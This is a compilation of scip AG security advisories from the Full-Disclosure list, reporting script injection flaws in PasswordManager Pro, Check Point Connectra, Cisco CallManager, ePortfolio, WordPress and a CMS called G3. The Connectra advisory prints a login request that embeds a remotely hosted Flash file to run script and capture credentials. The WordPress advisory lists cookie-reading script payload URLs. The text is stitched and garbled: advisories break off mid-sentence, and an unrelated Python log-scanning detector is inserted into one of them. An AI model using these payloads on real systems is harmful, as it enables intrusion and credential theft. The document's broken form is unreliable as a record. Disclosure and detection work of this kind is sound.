[Full-disclosure] [scip-Advisory 4063] PasswordManager Pro 6.1 Script Injection Vulnerability

2009-12-15 Thread Stefan Friedli
PasswordManager Pro 6.1 Script Injection Vulnerability
scip AG Vulnerability ID 4063 (12/15/2009)
http://www.scip.ch/?vuldb.4063


I. INTRODUCTION

"Password Manager Pro is a secure vault for storing and managing shared
sensitive information such as passwords, documents and digital
identities of enterprises." 

More information is available on the official product web site at the
following URL[1]:

http://www.manageengine.com/products/passwordmanagerpro/


II. DESCRIPTION

Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.

The processing method for the search function fails to perform proper
input validation on the data that is being submitted via HTTP GET. The
parameter "searchtext" lacks validation and is therefore vulnerable to
script injection. While there is a basic input filtering method in
place, it fails to detect more advanced (e.g. encoded) payloads.
Other parts of the application might be affected too.

This vulnerability has been tested on version 6.1, other versions might
be affected as well.


III. EXPLOITATION

Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using simple exploit strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnake's popular XSS Cheat Sheet[2], which contains several patterns not
detected by the filter in place, allowing you to execute any
arbitrary, externally hosted payload.

Exploitation can be performed using any medium that is able to perform
a GET request. Under certain circumstances, it is even possible to
attack unauthenticated users, as the payload will be kept in the user's
session until authentication data has been entered.

We exploited the vulnerability for a customer in order to prove the
possibility of capturing usernames and passwords. One of the possibilities
mentioned above is to embed a remote Flash file and grant it the
permission to execute script code.


IV. IMPACT

Impact of the vulnerability depends on the stored data. PMP is often
used for corporate password management and contains highly sensitive
information. Therefore, a high amount of damage might be caused by
successful exploitation and follow-up attacks.


V. DETECTION

Detection of web-based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to compose an HTML tag.
In some cases single (') or double quotes (") are required to inject the
code into a given HTML statement. Some implementations of security systems
look for well-known attack tags such as
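The pattern-based detection described in this section (and in the identical section of the Connectra advisory below), as an added example rather than anything from the advisories: it decodes percent- and entity-encoded parameter values before looking for the <, >, ' and " characters, so encoded variants of a payload are caught as well. The log lines, the log format and the function names are constructed for the example.

```python
import html
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Characters the advisory names as the usual building blocks of an injected
# HTML tag or of an attribute break-out.
SUSPICIOUS = set('<>"\'')


def normalize(value: str, rounds: int = 3) -> str:
    """Undo percent-encoding (repeatedly, to catch double encoding) and HTML
    entities so that an encoded payload cannot slip past a literal match."""
    for _ in range(rounds):
        decoded = html.unescape(unquote(value))
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(url: str) -> dict:
    """Return {parameter: decoded value} for every query parameter whose
    normalized value contains one of the suspicious characters."""
    hits = {}
    for name, raw in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        decoded = normalize(raw)  # parse_qsl already decoded one layer
        if SUSPICIOUS & set(decoded):
            hits[name] = decoded
    return hits


# Common-log-format request line (constructed format, not the product's).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)


def scan_log(lines):
    """Return (client ip, parameter, decoded value) per suspicious request."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        for name, value in suspicious_params(m.group("path")).items():
            findings.append((m.group("ip"), name, value))
    return findings


# Constructed sample log lines. The second request is double encoded
# (%253C -> %3C -> <) and would evade a matcher that decodes only once;
# the third is singly encoded. Both are flagged once normalized.
SAMPLE_LOG = [
    '10.0.0.5 - - [15/Dec/2009:10:01:02 +0100] "GET /search?searchtext=backup+server HTTP/1.1" 200 1234',
    '10.0.0.9 - - [15/Dec/2009:10:02:17 +0100] "GET /search?searchtext=%253Cb%253Ehi%253C%252Fb%253E HTTP/1.1" 200 1200',
    '10.0.0.9 - - [15/Dec/2009:10:03:40 +0100] "GET /search?searchtext=%22%3E%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 1200',
]
```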

[Full-disclosure] [scip_Advisory 4020] Check Point Connectra R62 Login Script Injection Vulnerability

2009-09-21 Thread Stefan Friedli
Check Point Connectra R62 Login Script Injection Vulnerability
scip AG Vulnerability ID 4020 (09/04/2009)
http://www.scip.ch/?vuldb.4020

I. INTRODUCTION

Check Point Connectra is a so-called SSL-VPN solution, which allows
users to access a remote system using a regular web browser.

More information is available on the official product web site at the
following URL[1]:

http://www.checkpoint.com/products/connectra/index.html

II. DESCRIPTION

Stefan Friedli at scip AG (Switzerland) found an input validation error
within the current release, which enabled an attacker to perform various
web-based attacks.

The initial logon script at /Login/Login, which is used by
unauthenticated users to log in, fails to perform proper input
validation on the data that is being submitted via HTTP POST. While
certain fields are escaped before being sent back to the user's browser, the
parameter "vpid_prefix" lacks any validation and is therefore vulnerable
to script injection.
Other parts of the application might be affected too.

This vulnerability has been tested on version R62, other versions might
be affected as well.

III. EXPLOITATION

Classic script injection techniques and unexpected input data within a
browser session can be used to exploit these vulnerabilities. The target
application does actually check for certain patterns and prevents an
attacker from using simple exploit strings containing substrings like
"script", "javascript", "alert" or similar. However, we consider this to
be an imperfect mechanism that is unable to prevent an attack using a
more sophisticated payload. For a selection, you might want to check
RSnake's popular XSS Cheat Sheet[2], which contains several patterns not
detected by the filter in place, allowing you to execute any
arbitrary, externally hosted payload.

We exploited the vulnerability for a customer in order to prove the
possibility of capturing usernames and passwords. One of the possibilities
mentioned above is to embed a remote Flash file and grant it the
permission to execute script code.

Vulnerable Variable Value:

vpid_prefix = ">http://www.scip.ch/p/s/w/ccs.swf"; 
allowScriptAccess=always>https://TARGET:443/Login/Login HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.2)
Gecko/20090729 Firefox/3.5.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://TARGET/Login/Login?LangCode=
Cookie: CheckCookieSupport=1; ICSCookie=***purged***; user_locale=en_US
Content-Type: application/x-www-form-urlencoded
Content-length: 153

loginType=Standard&userName=&vpid_prefix=">http://www.scip.c
h/p/s/w/ccs.swf" 
allowScriptAccess=always>http://www.scip.ch/p/s/w/ccs.swf";
allowScriptAccess=always>
--- CUT END ---

IV. IMPACT

Because non-authenticated parts of the software are affected, this
vulnerability is serious for every secure environment. Non-authenticated
users might be able to exploit this flaw to gain elevated privileges in
the target environment (e.g. extracting sensitive cookie information or
login information) or to perform any other form of web-based attacks.
Due to the fact that the application will often be allowed to make use
of ActiveX, it can also be used as a springboard to inject other
payloads, for example MS09-037[3] or any other vulnerability disclosed
lately, that might be exploited using a web browser.

Because other parts of the application might be affected too - this
could include some second order vulnerabilities - a severe attack
scenario might be possible.

V. DETECTION

Detection of web-based attacks requires a specialized web proxy and/or
intrusion detection system. Patterns for such a detection are available
and easy to implement. Usually the mathematical or logical symbols for
less-than (<) and greater-than (>) are required to compose an HTML tag.
In some cases single (') or double quotes (") are required to inject the
code into a given HTML statement. Some implementations of security systems
look for well-known attack tags such as

[Full-disclosure] Cisco CallManager 4.1 Input Validation Vulnerability

2007-05-23 Thread Stefan Friedli
Cisco CallManager 4.1 Input Validation Vulnerability

scip AG Vulnerability ID 2977 (03/13/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2977

I. INTRODUCTION

Cisco CallManager, CCM for short, is a professional voice-over-IP solution
that tracks active components, including among others phones, gateways,
conference bridges, transcoding resources and voicemail boxes.

II. DESCRIPTION

Marc Ruef and Stefan Friedli found a web-based vulnerability that was
identified in Cisco CallManager 4.1 and may affect earlier versions as well.

The web interface of the application fails to properly sanitize data
supplied by the search form before displaying it back to the user.
Though several filters are in place to prevent the injection of

[Full-disclosure] ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities

2007-03-05 Thread Stefan Friedli

ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities

scip AG Vulnerability ID 2893 (12/22/2006)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893

I. INTRODUCTION

ePortfolio is an e-banking application by TKS Banking Solutions.

More information is available on the vendor's web site at the following URL:

 http://www.tksbankingsolutions.com/

II. DESCRIPTION

Stefan Friedli found several web-based vulnerabilities that were 
identified in ePortfolio version 1.0 Java and may affect earlier 
versions as well.

The application uses heavy amounts of JavaScript code for operation. While
this is not generally a bad thing, it causes massive problems when it
comes to data validation. As we recognized, the entire validation of
input is realized by client-side JavaScript, which can easily be bypassed
using a proxy such as Burp Proxy or WebScarab to modify original requests sent
(and validated) by the browser.

We assume this vulnerability to exist in nearly every form offered by 
the application. Due to the limited functionality of the account used 
for testing, we're not able to definitely confirm or deny this fact.

PoC Code is not being published.


IV. IMPACT

As there is a serious lack of server-side measures to protect the
application from malicious input, an attacker may realize nearly every
attack that relies on lacking input validation, which includes Cross-Site
Scripting and Cross-Site Request Forgery (Session Riding).

V. DETECTION

Detection of web based attacks requires a specialized web proxy and/or 
intrusion detection system. Patterns for detection of basic attacks are 
available and easy to implement, though they may possibly fail on more 
sophisticated attacks.

VI. SOLUTION

Server-side input validation should be provided by the application vendor
as soon as possible.


VII. VENDOR RESPONSE

The problems were recognized and will, according to the vendor, be
addressed with the next release by the end of this week. Further, the
vendor claims to be able to change the faulty behaviour remotely or by
editing a non-specified file for existing customers.

VIII. SOURCES

scip AG - Security Consulting Information Process (german)
http://www.scip.ch

scip AG Vulnerability Database (german)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893

IX. DISCLOSURE TIMELINE

12/22/06 Identification of the vulnerabilities
02/05/07 Notification of the vendor
03/02/07 Vendor Response
03/02/07 Release of public advisory

IX. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

 Stefan Friedli, scip AG, Zuerich, Switzerland
 stfr-at-scip.ch
 http://www.scip.ch


A2. LEGAL NOTICES

Copyright (c) 2007 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not 
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time 
of publishing based on currently available information. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect or 
consequential loss or damage from use of or reliance on this advisory.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities

2007-02-27 Thread Stefan Friedli

Wordpress 2.1.1 - Multiple Script Injection Vulnerabilities

scip AG Vulnerability ID 2962 (02/27/2007)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962

I. INTRODUCTION

"WordPress is a state-of-the-art semantic personal publishing platform 
with a focus on aesthetics, web standards, and usability."
More information is available on the project web site at the following URL:

 http://www.wordpress.org

II. DESCRIPTION

Stefan Friedli found several vulnerabilities based on an advisory
entitled "WordPress AdminPanel CSRF/XSS - 0day" by "Samenspender", which
described a lack of input validation when deleting posts that allows
injection of arbitrary code. The vulnerability was reported on February
26th and is referenced in section VII.

Further to this vulnerability, which was limited to manipulating the
"post" parameter, there are several other vulnerabilities which are very
similar to the one mentioned above. Every operation that makes use of
the common confirm dialog is vulnerable to this type of attack.

Possible injection...

... when deleting posts as mentioned in Samenspender's advisory
(unvalidated parameter: post, file: post.php)
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=39&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting pages (unvalidated parameter: page, file: page.php)
http://target.tld/wp-admin/page.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting categories (unvalidated parameter: cat_ID, file: 
categories.php)
http://target.tld/wp-admin/categories.php?action=delete&cat_ID='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

... when deleting comments (unvalidated parameter: c, file: comment.php)
http://target.tld/wp-admin/comment.php?action=deletecomment&p=35&c='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

IV. IMPACT

This list may not be exhaustive. It illustrates that the flaw with
confirmation dialogs in WordPress is not limited to the "Delete
Post" function. Fixing the validation of the post parameter as suggested
by e.g. Secunia does not fix the problem and does not reduce the threat
of cross-site scripting or any other web-based exploitation.

V. DETECTION

These flaws can be detected by using any web browser.

VI. SOLUTION

Until these issues are patched, possible workarounds are manual fixing
or the usage of an application-level filter like mod_security for Apache.

VII. SOURCES

Samenspender - WordPress AdminPanel CSRF/XSS - 0day
http://seclists.org/bugtraq/2007/Feb/0494.html

scip AG - Security Consulting Information Process (german)
http://www.scip.ch

scip AG Vulnerability Database (german)
http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2962

IX. DISCLOSURE TIMELINE

02/26/06 Release of "Delete Post" confirmation vulnerability
02/27/06 Identification of further vulnerabilities
02/27/06 Immediate release for informational purposes

IX. CREDITS

The vulnerabilities were discovered by Stefan Friedli.

 Stefan Friedli, scip AG, Zuerich, Switzerland
 stfr-at-scip.ch
 http://www.scip.ch

A2. LEGAL NOTICES

Copyright (c) 2007 scip AG, Switzerland.

Permission is granted for the re-distribution of this alert. It may not 
be edited in any way without permission of scip AG.

The information in the advisory is believed to be accurate at the time 
of publishing based on currently available information. There are no 
warranties with regard to this information. Neither the author nor the 
publisher accepts any liability for any direct, indirect or 
consequential loss or damage from use of or reliance on this advisory.




[Full-disclosure] Content Management Framework "G3" - XSS Vulnerability in Search Function

2006-08-02 Thread Stefan Friedli
Content Management Framework "G3" - XSS Vulnerability in Search Function

INTRO

According to the manufacturer, "G3" is a classic content management system, allowing customers to manage their own websites without knowing much about web publishing.

Information about the product is available at:
http://www.inm.ch/g3.cms/s_page/56770

DESCRIPTION

Stefan Friedli discovered an XSS vulnerability in the search module used by many websites powered by G3. By using the characters "<", ">" and quotes, the form can be used to include script code. As there seems to be no distinction between parameters being passed by GET or POST, it is possible to pass manipulated content to other users using a simple link carrying the parameter search_string.

EXPLOIT

Classic browser-based script injection techniques are sufficient to exploit this vulnerability.

POSSIBLE IMPACT

As with most XSS vulnerabilities, the impact of this flaw depends on the page being attacked. In this case, a "trusted" site may be used to exploit vulnerabilities in older browsers or to compromise accounts on sites using authentication. For several customers of INM, this flaw could cause some additional trouble because of possible phishing attacks using this vulnerability to trick customers.

SOLUTION

The vulnerability has not been addressed yet. A patch implementing basic input validation would solve the problem.

VENDOR RESPONSE

INM was informed about this vulnerability on 2006-07-06. A reminder was sent 14 days later. There has been no reaction to any message regarding this issue.

TIMELINE

2006-07-05 - Discovery
2006-07-06 - INM has been informed about the flaw
2006-07-20 - Reminder has been sent
2006-08-02 - Public advisory has been published

CREDITS

This vulnerability was discovered by Stefan Friedli. It may be redistributed as-is.